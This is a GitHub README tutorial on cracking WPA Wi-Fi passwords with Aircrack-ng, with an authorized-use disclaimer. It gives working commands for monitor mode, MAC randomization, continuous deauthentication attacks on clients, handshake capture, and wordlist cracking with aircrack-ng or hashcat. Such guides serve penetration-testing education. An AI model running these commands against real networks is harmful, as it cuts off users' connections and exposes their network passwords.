Skip to content

Bolo101/WPA-Cracking

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 

Repository files navigation

WPA Handshake Cracking Guide

This guide documents the commands and procedures for capturing WPA handshakes using the Aircrack-ng suite.

⚠️ Important Disclaimer

DO NOT PERFORM ATTACKS ON UNAUTHORIZED NETWORKS. This guide is for educational purposes and authorized security testing only. Always obtain proper authorization before testing any network security.


Prerequisites

  • A wireless network interface (can be wlan0 or any available interface)
  • External Wi-Fi adapter (if using a virtual machine)
  • Aircrack-ng suite installed
  • Wordlist (e.g., rockyou.txt)

1. Set Network Interface to Monitor Mode

Enable your wireless interface to listen to wireless traffic:

sudo airmon-ng start wlan0

Note: Your network interface doesn't have to be wlan0. It can be any wireless interface available on your system. If using a virtual machine, ensure your external Wi-Fi adapter is properly configured.

Manual Alternative

The airmon-ng script is equivalent to running these commands manually:

sudo ifconfig wlan0 down
iwconfig wlan0 mode monitor
macchanger -r wlan0     # Adds a layer of security by randomizing the MAC address
sudo ifconfig wlan0 up

2. Monitor Wireless Traffic

Scan for available wireless networks:

sudo airodump-ng wlan0

Once you identify your target network, note the following information:

  • BSSID: The wireless network identifier (MAC address)
  • Channel: The channel number used by the network

Filter Results

To focus on a specific network, filter by channel and BSSID:

sudo airodump-ng -c <channel> -d <bssid> wlan0

Replace <channel> and <bssid> with your target values.


3. Capture WPA Handshake

This process requires two simultaneous operations.

Step 3.1: Start Capturing Traffic

Begin listening and save the captured data to a file. This file will be used for password brute-force attacks and can be analyzed with Wireshark:

sudo airodump-ng -w <PATH/FILENAME> -c <channel> --bssid <bssid> wlan0

Parameters:

  • -w: Specify the output file path and name
  • -c: Target channel
  • --bssid: Target network BSSID

Step 3.2: Deauthentication Attack

In a separate terminal, initiate a deauthentication attack against a connected device to force a disconnection. When the device reconnects, a new handshake will be captured:

sudo aireplay-ng --deauth 0 -a <bssid> wlan0

Parameters:

  • --deauth 0: Send continuous deauthentication packets
  • -a: Target BSSID

Note: Keep both commands running until you see the "WPA handshake" message in the airodump-ng output.


4. Restore Interface and Brute-Force Password

Step 4.1: Restore Managed Mode

Once the WPA handshake is captured, return your wireless interface to managed mode:

sudo airmon-ng stop wlan0

Step 4.2: Brute-Force Attack

Use the captured handshake file to crack the password:

aircrack-ng <PATH/FILENAME.cap> -w /usr/share/wordlists/rockyou.txt

Parameters:

  • <PATH/FILENAME.cap>: The captured file (usually .cap extension)
  • -w: Path to your wordlist

Alternative: Hashcat

For faster brute-force attacks, you can use Hashcat instead of aircrack-ng:

hashcat -m 2500 <PATH/FILENAME.hccapx> /usr/share/wordlists/rockyou.txt

Additional Notes

  • File Formats: Airodump-ng typically generates .cap files. Hashcat requires .hccapx format, which can be converted using cap2hccapx.
  • Wordlists: The rockyou.txt wordlist is commonly used, but you can use any custom wordlist appropriate for your needs.
  • Legal Compliance: Always ensure you have explicit permission before testing any network security.

Resources

About

No description, website, or topics provided.

Resources

Stars

0 stars

Watchers

1 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors